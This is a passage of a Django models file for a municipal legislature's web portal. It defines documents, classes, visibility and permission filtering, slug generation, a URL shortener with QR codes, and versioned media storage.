4: 'path/path_parlamentar.html',
5: 'path/path_galeria.html',
6: 'path/path_classe.html',
7: 'path/path_galeria_video.html',
99: 'path/path_documento.html',
}
CLASSE_DOC_MANAGER_CHOICE = {
1: 'qs_news',
2: 'view_public_gallery',
3: 'qs_news',
4: 'qs_news',
5: 'qs_bi',
6: 'qs_audio_news',
7: 'qs_video_news',
99: None,
}
CLASSE_TEMPLATES_CHOICE = CmjChoices(
(1, 'lista_em_linha', _('Listagem em Linha')),
(2, 'galeria', _('Galeria Albuns')),
(3, 'parlamentares', _('Página dos Parlamentares')),
(4, 'parlamentar', _('Página individual de Parlamentar')),
(5, 'fotografia', _('Banco de Imagens')),
(6, 'galeria_audio', _('Galeria de Áudios')),
(7, 'galeria_video', _('Galeria de Vídeos')),
(99, 'documento_especifico', _('Documento Específico')),
)
class Parent(models.Model):
parent = models.ForeignKey(
'self',
blank=True, null=True, default=None,
related_name='childs',
verbose_name=_('Filhos'),
on_delete=PROTECT)
raiz = models.ForeignKey(
'self',
blank=True, null=True, default=None,
related_name='nodes',
verbose_name=_('Containers'),
on_delete=PROTECT)
related_classes = models.ManyToManyField(
'self', blank=True,
verbose_name=_('Classes Relacionadas'))
class Meta:
abstract = True
@property
def parents(self):
if not self.parent:
return []
parents = self.parent.parents + [self.parent, ]
return parents
@property
def parents_and_me(self):
if not self.parent:
return [self]
parents = self.parent.parents + [self.parent, self]
return parents
@property
def classes_parents(self):
if not hasattr(self, 'classe'):
return self.parents
_p = self.parents
p = _p or [self]
parents = p[0].classe.parents_and_me + _p
return parents
@property
def classes_parents_and_me(self):
if not hasattr(self, 'classe'):
return self.parents_and_me
p = self.parents_and_me
parents = p[0].classe.parents_and_me + p
return parents
def treechilds2list(self):
yield self
for child in self.childs.view_childs():
for item in child.treechilds2list():
yield item
class CMSMixin(models.Model):
STATUS_PRIVATE = 99
STATUS_RESTRICT = 1
STATUS_PUBLIC = 0
VISIBILIDADE_STATUS = CmjChoices(
(STATUS_RESTRICT, 'status_restrict', _('Restrito')),
(STATUS_PUBLIC, 'status_public', _('Público')),
(STATUS_PRIVATE, 'status_private', _('Privado')),
)
ALINHAMENTO_LEFT = 0
ALINHAMENTO_JUSTIFY = 1
ALINHAMENTO_RIGHT = 2
ALINHAMENTO_CENTER = 3
alinhamento_choice = CmjChoices(
(ALINHAMENTO_LEFT, 'alinhamento_left', _('Alinhamento Esquerdo')),
(ALINHAMENTO_JUSTIFY, 'alinhamento_justify', _('Alinhamento Completo')),
(ALINHAMENTO_RIGHT, 'alinhamento_right', _('Alinhamento Direito')),
(ALINHAMENTO_CENTER, 'alinhamento_center', _('Alinhamento Centralizado')),
)
TD_NEWS = 0
TD_DOC = 5
TD_BI = 10
TD_GALERIA_PUBLICA = 20
TD_AUDIO_NEWS = 30
TD_VIDEO_NEWS = 40
TPD_TEXTO = 100
TPD_FILE = 200
TPD_CONTAINER_SIMPLES = 700
TPD_CONTAINER_EXTENDIDO = 701
TPD_CONTAINER_FILE = 750
TPD_VIDEO = 800
TPD_AUDIO = 850
TPD_IMAGE = 900
TPD_GALLERY = 901
# Documentos completos
TDs = (TD_NEWS, TD_DOC, TD_BI, TD_GALERIA_PUBLICA,
TD_AUDIO_NEWS, TD_VIDEO_NEWS)
# Containers
TDc = (TPD_CONTAINER_SIMPLES, TPD_CONTAINER_EXTENDIDO, TPD_CONTAINER_FILE)
# Partes
TDp = (TPD_TEXTO, TPD_FILE, TPD_VIDEO, TPD_AUDIO, TPD_IMAGE, TPD_GALLERY)
# Tipos não acessiveis diretamente via URL
TDp_exclude_render = (TPD_TEXTO,
TPD_CONTAINER_SIMPLES,
TPD_CONTAINER_EXTENDIDO,
TPD_VIDEO,
TPD_AUDIO)
tipo_parte_doc = {
'documentos': CmjChoices(
(TD_NEWS, 'td_news', _('Notícias')),
(TD_DOC, 'td_doc', _('Documento')),
(TD_BI, 'td_bi', _('Banco de Imagem')),
(TD_GALERIA_PUBLICA, 'td_galeria_publica', _('Galeria Pública')),
(TD_AUDIO_NEWS, 'td_audio_news', _('Áudio Notícia')),
(TD_VIDEO_NEWS, 'td_video_news', _('Vídeo Notícia')),
),
'containers': CmjChoices(
(TPD_CONTAINER_SIMPLES,
'container', _('Container Simples')),
(TPD_CONTAINER_EXTENDIDO,
'container_fluid', _('Container Extendido')),
(TPD_CONTAINER_FILE,
'container_file', _('Container de Imagens para Arquivo PDF')),
),
'subtipos': CmjChoices(
(TPD_TEXTO, 'tpd_texto', _('Texto')),
(TPD_FILE, 'tpd_file', _('Arquivo')),
(TPD_VIDEO, 'tpd_video', _('Vídeo')),
(TPD_AUDIO, 'tpd_audio', _('Áudio')),
(TPD_IMAGE, 'tpd_image', _('Imagem')),
(TPD_GALLERY, 'tpd_gallery', _('Galeria de Imagens')),
)
}
tipo_parte_doc_choice = (tipo_parte_doc['documentos'] +
tipo_parte_doc['containers'] +
tipo_parte_doc['subtipos'])
created = models.DateTimeField(
verbose_name=_('created'), editable=False, auto_now_add=True)
public_date = models.DateTimeField(
null=True, default=None,
verbose_name=_('Data de Início de Publicação'))
public_end_date = models.DateTimeField(
null=True, default=None,
verbose_name=_('Data de Fim de Publicação'))
owner = models.ForeignKey(
get_settings_auth_user_model(),
verbose_name=_('owner'), related_name='+',
on_delete=PROTECT)
descricao = models.TextField(
verbose_name=_('Descrição'),
blank=True, null=True, default=None)
autor = models.TextField(
verbose_name=_('Autor'),
blank=True, null=True, default=None)
visibilidade = models.IntegerField(
_('Visibilidade'),
choices=VISIBILIDADE_STATUS,
default=STATUS_PRIVATE)
listar = models.BooleanField(
_('Aparecer nas Listagens'),
choices=YES_NO_CHOICES,
default=True)
class Meta:
abstract = True
@property
def revisoes(self):
# implementado como property, e não como GR, devido a necessidade
# de manter a Revisão se o Documento for excluido.
concret_model = None
for kls in reversed(self.__class__.__mro__):
if issubclass(kls, CMSMixin) and not kls._meta.abstract:
concret_model = kls
qs = AuditLog.objects.filter(
content_type=ContentType.objects.get_for_model(concret_model),
object_id=self.pk)
return qs
@property
def revisoes_old(self):
# implementado como property, e não como GR, devido a necessidade
# de manter a Revisão se o Documento for excluido.
concret_model = None
for kls in reversed(self.__class__.__mro__):
if issubclass(kls, CMSMixin) and not kls._meta.abstract:
concret_model = kls
qs = Revisao.objects.filter(
content_type=ContentType.objects.get_for_model(concret_model),
object_id=self.pk)
return qs
@property
def modified(self):
rev = self.revisoes
return rev.first().timestamp
def clean(self):
"""
Check for instances with null values in unique_together fields.
"""
from django.core.exceptions import ValidationError
super(CMSMixin, self).clean()
for field_tuple in self._meta.unique_together[:]:
unique_filter = {}
unique_fields = []
null_found = False
for field_name in field_tuple:
field_value = getattr(self, field_name)
if getattr(self, field_name) is None:
unique_filter['%s__isnull' % field_name] = True
null_found = True
else:
unique_filter['%s' % field_name] = field_value
unique_fields.append(field_name)
if null_found:
unique_queryset = self.__class__.objects.filter(
**unique_filter)
if self.pk:
unique_queryset = unique_queryset.exclude(pk=self.pk)
if unique_queryset.exists():
msg = self.unique_error_message(
self.__class__, tuple(unique_fields))
raise ValidationError(msg)
class Slugged(Parent):
titulo = models.CharField(
verbose_name=_('Título'),
max_length=250,
blank=True, null=True, default='')
apelido = models.CharField(
verbose_name=_('Apelido'),
max_length=250,
blank=True, null=True, default='')
slug = models.SlugField(max_length=2000)
class Meta:
abstract = True
def _local_save(self, *args, **kwargs):
super(Slugged, self).save(*args, **kwargs)
def save(self, *args, **kwargs):
slug_old = self.slug
if not self.id:
super(Slugged, self).save(*args, **kwargs)
kwargs['force_insert'] = False
kwargs['force_update'] = True
if self._meta.model == Documento and not self.parent and self.titulo:
slug = self.titulo
elif self._meta.model == Classe:
slug = self.titulo
else:
slug = str(self.id)
self.slug = self.generate_unique_slug(slug)
if self.parent and hasattr(self, 'classe'):
self.visibilidade = self.parent.visibilidade
self.public_date = self.parent.public_date
self.listar = self.parent.listar
if hasattr(self, 'classe'):
self.classe = self.parent.classe
self.raiz = self.parent.raiz if self.parent.raiz else self.parent
super(Slugged, self).save(*args, **kwargs)
if self._meta.model == Classe and self.slug != slug_old:
count = self.documento_set.filter(parent__isnull=True).count()
for documento in self.documento_set.filter(parent__isnull=True):
documento.save()
# print(self.titulo, count, self.slug)
count -= 1
for child in self.childs.all():
child.save()
if hasattr(self, 'cita'):
for citacao in self.cita.all():
citacao.save()
def generate_unique_slug(self, slug):
concret_model = None
for kls in reversed(self.__class__.__mro__):
if issubclass(kls, Slugged) and not kls._meta.abstract:
concret_model = kls
slug = slugify(slug)
parents_slug = (self.parent.slug + '/') if self.parent else ''
custom_slug = ''
if not self.parent and hasattr(self, 'classe'):
custom_slug = self.classe.slug + '/'
elif hasattr(self, 'referente'):
custom_slug = self.referente.slug + '/'
slug_base = custom_slug + parents_slug + slug
slug = slug_base
i = 0
while True:
if i > 0:
slug = "%s-%s" % (slug_base, i)
try:
obj = concret_model.objects.get(
# **{'slug': slug, 'parent': self.parent})
** {'slug': slug})
if obj == self:
raise ObjectDoesNotExist
except ObjectDoesNotExist:
break
i += 1
return slug
@cached_property
def nivel(self):
parents = self.parents
return len(parents)
@property
def strparents(self):
if not self.parent:
return []
parents = self.parent.strparents + [self.parent.titulo, ]
return parents
def __str__(self):
parents = self.strparents
parents.append(self.titulo)
return ':'.join(parents)
@property
def absolute_slug(self):
raise NotImplementedError(_('Método não implementado pela subclasse!'))
# short_service = build(
# 'urlshortener', 'v1', developerKey=settings.GOOGLE_URL_SHORTENER_KEY)
def short_url(**kwargs):
return ''
# GOOGLE FOI DESATIVADO EM 30/05/2019
import urllib3
import json
domain = kwargs.get('domain', 'https://www.jatai.go.leg.br')
slug = kwargs.get('slug', '')
fields = {
'longUrl': '%s/%s' % (domain, slug),
}
encoded_data = json.dumps(fields).encode('utf-8')
http = urllib3.PoolManager()
r = http.request(
'POST',
'https://www.googleapis.com/urlshortener/v1/url?'
'fields=id&key=' + settings.GOOGLE_URL_SHORTENER_KEY,
body=encoded_data,
headers={'Content-Type': 'application/json'})
try:
data = r.data.decode('utf-8')
jdata = json.loads(data)
return jdata['id']
except Exception as e:
print(e)
return ''
class UrlShortenerManager(models.Manager):
def get_or_create_short(self, **kwargs):
url = self.get_queryset().filter(**kwargs).first()
if not url:
bts = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
url = UrlShortener()
url.url_long = kwargs['url_long']
url.automatico = kwargs.get('automatico', True)
url.link_absoluto = kwargs.get('link_absoluto', False)
url.save()
def b62encode(id):
if id < 62:
return bts[id]
r = id % 62
return b62encode(id // 62) + bts[r]
# rn*62^n + ... + r2*62^2 + r1*62^1 + q*62^0
url_short = b62encode(url.id)
url.url_short = url_short
url.save()
return url
class UrlShortener(models.Model):
objects = UrlShortenerManager()
url_short = models.TextField(
verbose_name=_('Link Curto'),
db_index=True,
blank=True, null=True, default=None)
url_long = models.TextField(
verbose_name=_('Link Longo'),
db_index=True)
link_absoluto = models.BooleanField(
_('Link Absoluto'),
choices=YES_NO_CHOICES,
default=False)
automatico = models.BooleanField(
_('Link Automático'),
choices=YES_NO_CHOICES,
default=True)
created = models.DateTimeField(
verbose_name=_('Data de Criação'),
editable=False, auto_now_add=True)
class Meta:
ordering = ('url_short',)
unique_together = (
('url_short', 'url_long',),
)
verbose_name = _('UrlShortener')
verbose_name_plural = _('UrlShortener')
@property
def absolute_short(self, protocol=True):
if settings.DEBUG:
return 'http://localhost:9000/j{}'.format(
self.url_short
)
return '{}jatai.go.leg.br/j{}'.format(
'https://' if protocol else '',
self.url_short
)
def __str__(self):
return 'Link Curto: {}'.format(self.url_short)
@property
def qrcode(self):
fn = '/tmp/portalcmj_qrcode_{}.png'.format(self.url_short)
brasao = settings.FRONTEND_BRASAO_PATH['128']
ibr = Image.open(brasao)
new_image = Image.new("RGBA", (144, 128), "WHITE")
new_image.paste(ibr, (8, -10), ibr)
draw = Draw(new_image)
font = ImageFont.truetype(
font=settings.PROJECT_DIR.child('fonts').child('Helvetica.ttf'),
size=11)
size_text = font.getsize(self.absolute_short)
draw.rectangle(
(0, 128 - size_text[1] - 8, 144 - 1, 128 - 1),
fill=(17, 77, 129),
outline=(17, 77, 129),
width=2)
draw.text(
(72 - size_text[0] / 2, 128 - size_text[1] - 4),
self.absolute_short,
(255, 255, 255),
font=font)
draw.rectangle(
(0, 0, 144 - 1, 128 - 1),
fill=None,
outline=(17, 77, 129),
width=2)
qr = qrcode.QRCode(
version=6,
error_correction=qrcode.constants.ERROR_CORRECT_H,
box_size=8,
border=2
)
qr.add_data(self.absolute_short)
qr.make()
irq = qr.make_image().convert('RGB')
pos = ((irq.size[0] - new_image.size[0]) // 2,
(irq.size[1] - new_image.size[1]) // 2)
irq.paste(new_image, pos)
irq.save(fn)
with open(fn, 'rb') as f:
return f.read()
class ShortRedirect(models.Model):
url = models.ForeignKey(UrlShortener, related_name='acessos_set',
verbose_name=_('UrlShortner'),
on_delete=CASCADE)
metadata = JSONField(
verbose_name=_('Metadados'),
blank=True, null=True, default=None, encoder=DjangoJSONEncoder)
created = models.DateTimeField(
verbose_name=_('created'),
editable=False, auto_now_add=True)
class Meta:
ordering = ('-created',)
class ShortUrl(Slugged):
def short_url(self, sufix=None):
slug = self.absolute_slug + (sufix if sufix else '')
return UrlShortener.objects.get_or_create_short(
url_long=slug
).absolute_short
class Meta:
abstract = True
class Classe(ShortUrl, CMSMixin):
codigo = models.PositiveIntegerField(verbose_name=_('Código'), default=0)
perfil = models.IntegerField(
_('Perfil da Classe'),
choices=PERFIL_CLASSE,
default=CLASSE_ESTRUTURAL)
template_doc_padrao = models.IntegerField(
_('Template para o Documento'),
choices=DOC_TEMPLATES_CHOICE,
default=DOC_TEMPLATES_CHOICE.noticia)
tipo_doc_padrao = models.IntegerField(
_('Tipo Padrão para Documentos desta Classe'),
choices=CMSMixin.tipo_parte_doc['documentos'],
default=CMSMixin.TD_DOC)
template_classe = models.IntegerField(
_('Template para a Classe'),
choices=CLASSE_TEMPLATES_CHOICE,
default=CLASSE_TEMPLATES_CHOICE.lista_em_linha)
parlamentar = models.ForeignKey(
Parlamentar, related_name='classe_set',
verbose_name=_('Parlamentar'),
blank=True, null=True, default=None,
on_delete=PROTECT)
capa = models.OneToOneField(
'Documento',
blank=True, null=True, default=None,
verbose_name=_('Capa da Classe'),
related_name='capa',
on_delete=PROTECT)
class Meta:
ordering = ('codigo', '-public_date',)
unique_together = (
('slug', 'parent',),
)
verbose_name = _('Classe')
verbose_name_plural = _('Classes')
permissions = (
('view_subclasse', _('Visualização de Subclasses')),
('view_pathclasse', _('Visualização de Classe via Path')),
)
def imagem_representativa(self):
if hasattr(self, 'parlamentar'):
return self.parlamentar
return None
def imagem_representativa_metatags(self):
if hasattr(self, 'parlamentar'):
return self.parlamentar
return None
@cached_property
def conta(self):
ct = [str(p.codigo) for p in self.parents]
ct.append(str(self.codigo))
if len(ct[0]) < 3:
ct[0] = '{:03,d}'.format(int(ct[0]))
return '.'.join(ct)
@property
def absolute_slug(self):
return self.slug
class PermissionsUserClasse(CMSMixin):
user = models.ForeignKey(get_settings_auth_user_model(),
blank=True, null=True, default=None,
verbose_name=_('Usuário'),
on_delete=PROTECT)
classe = models.ForeignKey(Classe, verbose_name=_('Classe'),
related_name='permissions_user_set',
on_delete=PROTECT)
permission = models.ForeignKey(Permission,
blank=True, null=True, default=None,
verbose_name=_('Permissão'),
on_delete=PROTECT)
def __str__(self):
return '%s - %s' % (self.permission, self.user or '')
def validate_unique(self, exclude=None):
if 'classe' in exclude:
exclude.remove('classe')
CMSMixin.validate_unique(self, exclude=exclude)
class Meta:
unique_together = (
('user', 'classe', 'permission'),
)
verbose_name = _('Permissão de Usuário para Classe')
verbose_name_plural = _('Permissões de Usuários para Classes')
class DocumentoManager(models.Manager):
use_for_related_fields = True
filters_created = False
@property
def q_doc_public(self):
return (Q(public_end_date__gte=timezone.now()) |
Q(public_end_date__isnull=True) &
Q(public_date__lte=timezone.now(),
visibilidade=Documento.STATUS_PUBLIC))
def q_filters(self):
if self.filters_created:
return
self.filters_created = True
self.q_news = Q(tipo=Documento.TD_NEWS, parent__isnull=True)
self.q_doc = Q(tipo=Documento.TD_DOC, parent__isnull=True)
self.q_gallery = Q(tipo=Documento.TPD_GALLERY)
self.q_image = Q(tipo=Documento.TPD_IMAGE)
self.q_bi = Q(tipo=Documento.TD_BI, parent__isnull=True)
self.q_audio_news = Q(
tipo=Documento.TD_AUDIO_NEWS, parent__isnull=True)
self.q_video_news = Q(
tipo=Documento.TD_VIDEO_NEWS, parent__isnull=True)
def filter_q_private(self, user):
return Q(visibilidade=Documento.STATUS_PRIVATE, owner=user)
def filter_q_restrict(self, user):
qstatus = Q(visibilidade=Documento.STATUS_RESTRICT)
# Itens restritos que possuem usuário catalogados para o acesso
# e não dependem de permissões
q0 = Q(permissions_user_set__permission__isnull=True,
permissions_user_set__user=user)
# se não existir restrição, basta pertencer ao grupo de view restrito
q1 = Q(permissions_user_set__isnull=True)
q2 = Q(classe__permissions_user_set__permission__isnull=True,
classe__permissions_user_set__user=user)
q3 = Q(classe__permissions_user_set__isnull=True)
q4 = Q(permissions_user_set__user__isnull=True,
permissions_user_set__permission__isnull=False)
q5 = Q(classe__permissions_user_set__user__isnull=True,
classe__permissions_user_set__permission__isnull=False)
if type.mro(type(self))[0] == DocumentoManager:
return qstatus & (q0 | q1)
if isinstance(self.instance, Classe):
return qstatus & (q0 | (q1 & q3) | q2 | q3 | q4 | q5)
elif isinstance(self.instance, Parlamentar):
return qstatus & q0
elif isinstance(self.instance, Documento):
return qstatus
else:
raise Exception(_('Modelo não tratado na filtragem de um '
'Documento restrito'))
def filter_q_restrict_teste_com_permissoes(self, user):
qstatus = Q(visibilidade=Documento.STATUS_RESTRICT)
# Itens restritos que possuem usuário catalogados para o acesso
# e não dependem de permissões
q0 = Q(permissions_user_set__permission__isnull=True,
permissions_user_set__user=user)
# Itens restritos que não possuem usuário catalogados para o acesso
# mas exigem que o usuário possua certas permissões
q1 = Q(
permissions_user_set__permission__group_set__name=globalrules.GROUP_SIGAD_VIEW_STATUS_RESTRITOS,
permissions_user_set__user__isnull=True)
if type.mro(type(self))[0] == DocumentoManager:
# TODO: existe a possibilidade de isolar funcionalidades
# Q(owner=user) por exemplo um usuário poderia cadastrar um
# documento como restritoe, posteriormente um usuário de mais alto
# nível retirar a visualização deste que cadastrou adicionando
# apenas aqueles que podem ver.
# FIXME - se o documento é restrito e a consulta não é através de
# um RelatedManager e não possue regra explicita,
# o "q" abaixo não fez consultas nos pais como é feito
# individalmente na PathView em _pre_dispatch. PROJETAR como buscar
# regras gerais definidas nos pais, seja para usuários ou para
# permissões.
return qstatus & (q0 | q1)
if isinstance(self.instance, Classe):
parent = self.instance
q2 = Q(classe__permissions_user_set__permission__isnull=True,
classe__permissions_user_set__user=user)
q3 = Q(
classe__permissions_user_set__permission__group_set__name=globalrules.GROUP_SIGAD_VIEW_STATUS_RESTRITOS,
classe__permissions_user_set__user__isnull=True)
return (qstatus & (q0 | q1)) | (qstatus & (q2 | q3))
elif isinstance(self.instance, Parlamentar):
return qstatus & (q0 | q1)
elif isinstance(self.instance, Documento):
pass
else:
raise Exception(_('Modelo não tratado na filtragem de um '
'Documento restrito'))
def view_childs(self):
qs = self.get_queryset()
return qs.order_by('ordem')
def qs_bi(self, user=None): # banco de imagens
self.q_filters()
return self.qs_docs(user, q_filter=self.q_bi)
def qs_images(self, user=None):
self.q_filters()
return self.qs_docs(user, q_filter=self.q_image)
def qs_news(self, user=None):
self.q_filters()
return self.qs_docs(user, q_filter=self.q_news)
def qs_audio_news(self, user=None):
self.q_filters()
return self.qs_docs(user, q_filter=self.q_audio_news)
def qs_video_news(self, user=None):
self.q_filters()
return self.qs_docs(user, q_filter=self.q_video_news)
def all_docs(self):
qs = self.get_queryset()
return qs.filter(parent__isnull=True)
def public_all_docs(self):
qs = self.get_queryset()
if not self.filters_created:
self.q_filters()
return qs.filter(
self.q_doc_public,
parent__isnull=True).order_by('-public_date', '-created')
def qs_docs(self, user=None, q_filter=None):
if not q_filter:
self.q_filters()
q_filter = self.q_doc
qs = self.get_queryset()
qs = qs.filter(q_filter, self.q_doc_public)
if user and not user.is_anonymous:
# FIXME: manter condição apenas enquanto estiver desenvolvendo
if user.is_superuser:
qs_user = self.get_queryset()
qs_user = qs_user.filter(
Q(visibilidade=Documento.STATUS_PRIVATE) |
Q(visibilidade=Documento.STATUS_RESTRICT),
q_filter
)
else:
qs_user = self.get_queryset()
q = self.filter_q_private(user)
if user.groups.filter(
name=globalrules.GROUP_SIGAD_VIEW_STATUS_RESTRITOS
).exists():
q = q | self.filter_q_restrict(user)
qs_user = qs_user.filter(q, q_filter)
# print(str(qs_user.query))
qs = qs.union(qs_user)
else:
qs = qs.filter(listar=True)
qs = qs.order_by('-public_date', '-created')
return qs
def view_public_gallery(self):
qs = self.get_queryset()
qs = qs.filter(
Q(parent__parent__public_end_date__gte=timezone.now()) |
Q(parent__parent__public_end_date__isnull=True),
parent__parent__public_date__lte=timezone.now(),
parent__parent__visibilidade=Documento.STATUS_PUBLIC,
listar=True,
tipo=Documento.TPD_GALLERY
).order_by('-parent__parent__public_date')
return qs
def count_images(self):
qs = self.get_queryset()
return qs.filter(tipo=Documento.TPD_IMAGE).count()
def create_space(self, parent, ordem, exclude=None):
qs = self.get_queryset()
qs = qs.filter(parent_id=parent, ordem__gte=ordem)
if exclude:
qs = qs.exclude(id=exclude.id)
qs = qs.update(ordem=F('ordem') + 1)
return qs
def remove_space(self, parent, ordem, exclude=None):
qs = self.get_queryset()
qs = qs.filter(parent=parent, ordem__gte=ordem)
if exclude:
qs = qs.exclude(id=exclude.id)
qs = qs.update(ordem=F('ordem') - 1)
return qs
class Documento(ShortUrl, CMSMixin):
objects = DocumentoManager()
texto = models.TextField(
verbose_name=_('Texto'),
blank=True, null=True, default=None)
old_path = models.TextField(
verbose_name=_('Path no Portal Modelo 1.0'),
blank=True, null=True, default=None)
old_json = models.TextField(
verbose_name=_('Json no Portal Modelo 1.0'),
blank=True, null=True, default=None)
extra_data = django_extensions_JSONField(
verbose_name=_('Dados Extras'),
blank=True, null=True, default=None)
parlamentares = models.ManyToManyField(
Parlamentar, related_name='documento_set',
verbose_name=_('Parlamentares'))
materias = models.ManyToManyField(
MateriaLegislativa, related_name='documento_set',
verbose_name=_('Matérias Relacionadas'))
classe = models.ForeignKey(
Classe,
related_name='documento_set',
verbose_name=_('Classes'),
blank=True, null=True, default=None,
on_delete=PROTECT)
tipo = models.IntegerField(
_('Tipo da Parte do Documento'),
choices=CMSMixin.tipo_parte_doc_choice,
default=CMSMixin.TD_DOC)
template_doc = models.IntegerField(
_('Template para o Documento'),
choices=DOC_TEMPLATES_CHOICE,
blank=True, null=True, default=None)
# Possui ordem de renderização se não é uma parte de documento
ordem = models.IntegerField(
_('Ordem de Renderização'), default=0)
alinhamento = models.IntegerField(
_('Alinhamento'),
choices=CMSMixin.alinhamento_choice,
default=CMSMixin.ALINHAMENTO_LEFT)
documentos_citados = models.ManyToManyField(
'self',
through='ReferenciaEntreDocumentos',
through_fields=('referente', 'referenciado'),
symmetrical=False,)
class Meta:
ordering = ('public_date',)
verbose_name = _('Documento')
verbose_name_plural = _('Documentos')
permissions = (
('view_documento_show', _('Visualização dos Metadados do Documento.')),
('view_documento_media',
_('Visualização das mídias do Documento')),
)
@property
def ano(self):
return self.public_date.year if self.public_date else self.created.year
def __str__(self):
return self.titulo or self.get_tipo_display()
def is_parte_de_documento(self):
return self.tipo >= 100
@property
def absolute_slug(self):
return self.slug
# return '%s/%s' % (self.classe.slug, self.slug)
def imagem_representativa(self):
if self.tipo == Documento.TPD_IMAGE:
return self
elif self.tipo == Documento.TPD_GALLERY:
citado = self.cita.first()
return citado
img = self.nodes.view_childs().filter(
tipo=Documento.TPD_IMAGE).order_by('parent__ordem', 'ordem').first()
if img:
return img
galeria = self.nodes.view_childs().filter(
tipo=Documento.TPD_GALLERY).order_by('parent__ordem', 'ordem').first()
if galeria:
img = galeria.cita.first()
return img
return None
def imagem_representativa_metatags(self):
img = self.imagem_representativa()
if img:
return img
if not self.parlamentares.exists():
return None
return self.parlamentares.first()
def short_url(self):
return super().short_url(
sufix='.page'
if self.tipo == Documento.TPD_IMAGE else None)
def url_prefixo_parlamentar(self):
if self.parlamentares.count() != 1:
return ''
p = self.parlamentares.first()
c = p.classe_set.first()
if not c:
return ''
return c.absolute_slug
def delete(self, using=None, keep_parents=False, user=None):
# transfere midia, caso exista, para ult rev de cada descendente
childs = self.childs.view_childs()
for child in childs:
child.delete()
ultima_revisao = self.revisoes.first()
if hasattr(self, 'midia'):
midia = self.midia
print(midia.pk)
midia.documento = None
midia.auditlog = ultima_revisao
midia.save()
for cita in self.cita.all():
cita.delete()
return super().delete(using=using, keep_parents=keep_parents)
@property
def alinhamento_css_class(self):
return self.alinhamento_choice.triple(self.alinhamento)
@property
def visibilidade_css_class(self):
return self.VISIBILIDADE_STATUS.triple(self.visibilidade)
@property
def is_pdf(self):
return self.midia.last.content_type == 'application/pdf'
@property
def is_pdf_container(self):
s = set(self.childs.all().order_by(
'-midia__versions__created').values_list(
'midia__versions__content_type', flat=True))
return not bool(s - TIPOS_IMG_PERMITIDOS)
def build_container_file(self):
s = set(self.childs.all().order_by(
'-midia__versions__created').values_list(
'midia__versions__content_type', flat=True))
if not (s - TIPOS_IMG_PERMITIDOS):
response = HttpResponse(content_type='application/pdf')
response['Content-Disposition'] = \
'inline; filename="documento.pdf"'
doc = SimpleDocTemplate(
response,
rightMargin=0,
leftMargin=0,
topMargin=0,
bottomMargin=0)
c = canvas.Canvas(response)
c.setTitle(self.titulo)
A4_landscape = landscape(A4)
for img in self.childs.order_by('ordem'):
path = img.midia.last.file.path
if img.midia.last.is_paisagem:
c.setPageSize(A4_landscape)
else:
c.setPageSize(A4)
dim = A4_landscape if img.midia.last.is_paisagem else A4
c.drawImage(path, 0, 0,
width=dim[0],
height=dim[1])
c.showPage()
c.save()
return response
else:
file_buffer = io.BytesIO()
with zipfile.ZipFile(file_buffer, 'w') as file:
for f in self.childs.order_by('ordem'):
fn = '%s-%s' % (
f.id,
f.midia.last.file.path.split(
'/')[-1])
file.write(f.midia.last.file.path,
arcname=fn)
response = HttpResponse(file_buffer.getvalue(),
content_type='application/zip')
response['Cache-Control'] = 'no-cache'
response['Pragma'] = 'no-cache'
response['Expires'] = 0
response['Content-Disposition'] = \
'inline; filename=%s.zip' % self.raiz.slug
return response
class ReferenciaEntreDocumentosManager(models.Manager):
def create_space(self, referente, ordem, exclude=None):
qs = self.get_queryset()
qs = qs.filter(referente=referente, ordem__gte=ordem)
if exclude:
qs = qs.exclude(id=exclude.id)
qs = qs.update(ordem=F('ordem') + 1)
return qs
def remove_space(self, referente, ordem, exclude=None):
qs = self.get_queryset()
qs = qs.filter(referente=referente, ordem__gte=ordem)
if exclude:
qs = qs.exclude(id=exclude.id)
qs = qs.update(ordem=F('ordem') - 1)
return qs
class ReferenciaEntreDocumentos(ShortUrl):
objects = ReferenciaEntreDocumentosManager()
# TODO - IMPLEMENTAR VISIBILIDADE NA REFERENCIA...
# SIGNIFICA QUE O DOC PRIVADO PODE SER PÚBLICO POR REFERENCIA
# TRATAR SEGURANÇA PARA QUEM REALIZAR ESSA MUDANÇA DE VISIBILIDADE
referente = models.ForeignKey(Documento, related_name='cita',
verbose_name=_('Documento Referente'),
on_delete=models.PROTECT)
referenciado = models.ForeignKey(Documento, related_name='citado_em',
verbose_name=_('Documento Referenciado'),
on_delete=models.CASCADE)
descricao = models.TextField(
verbose_name=_('Descrição'),
blank=True, null=True, default=None)
autor = models.TextField(
verbose_name=_('Autor'),
blank=True, null=True, default=None)
# Possui ordem de renderização
ordem = models.IntegerField(
_('Ordem de Renderização'), default=0)
class Meta:
ordering = ('referente', 'ordem')
def short_url(self):
return super().short_url(
sufix='.page'
if self.referenciado.tipo == Documento.TPD_IMAGE else None)
@property
def parents(self):
_self = self.referente
if not _self.parent:
return []
parents = _self.parent.parents + [_self.parent, ]
return parents
@property
def absolute_slug(self):
# return '%s/%s' % (self.referente.absolute_slug, self.slug)
return self.slug
class PermissionsUserDocumento(CMSMixin):
user = models.ForeignKey(get_settings_auth_user_model(),
blank=True, null=True, default=None,
verbose_name=_('Usuário'),
on_delete=PROTECT)
documento = models.ForeignKey(Documento,
related_name='permissions_user_set',
verbose_name=_('Documento'),
on_delete=PROTECT)
permission = models.ForeignKey(Permission,
blank=True, null=True, default=None,
verbose_name=_('Permissão'),
on_delete=PROTECT)
class Meta:
unique_together = (
('user', 'documento', 'permission'),
)
verbose_name = _('Permissão de Usuário para Documento')
verbose_name_plural = _('Permissões de Usuários para Documentos')
class Midia(models.Model):
documento = models.OneToOneField(
Documento,
blank=True, null=True, default=None,
verbose_name=_('Documento'),
related_name='midia',
on_delete=PROTECT)
auditlog = models.OneToOneField(
AuditLog,
blank=True, null=True, default=None,
verbose_name=_('AuditLog'),
related_name='midia',
on_delete=PROTECT)
class Meta:
verbose_name = _('Mídia Versionada')
verbose_name_plural = _('Mídias Versionadas')
@cached_property
def last(self):
return self.versions.first()
def media_path(instance, filename):
return './sigad/documento/%s/media/%s/%s' % (
instance.midia.documento_id,
instance.midia_id,
filename)
class VersaoDeMidia(models.Model):
FIELDFILE_NAME = ('file',)
metadata = JSONField(
verbose_name=_('Metadados'),
blank=True, null=True, default=None, encoder=DjangoJSONEncoder)
created = models.DateTimeField(
verbose_name=_('created'),
editable=False, auto_now_add=True)
owner = models.ForeignKey(
get_settings_auth_user_model(),
verbose_name=_('owner'), related_name='+',
on_delete=PROTECT)
file = models.FileField(
blank=True,
null=True,
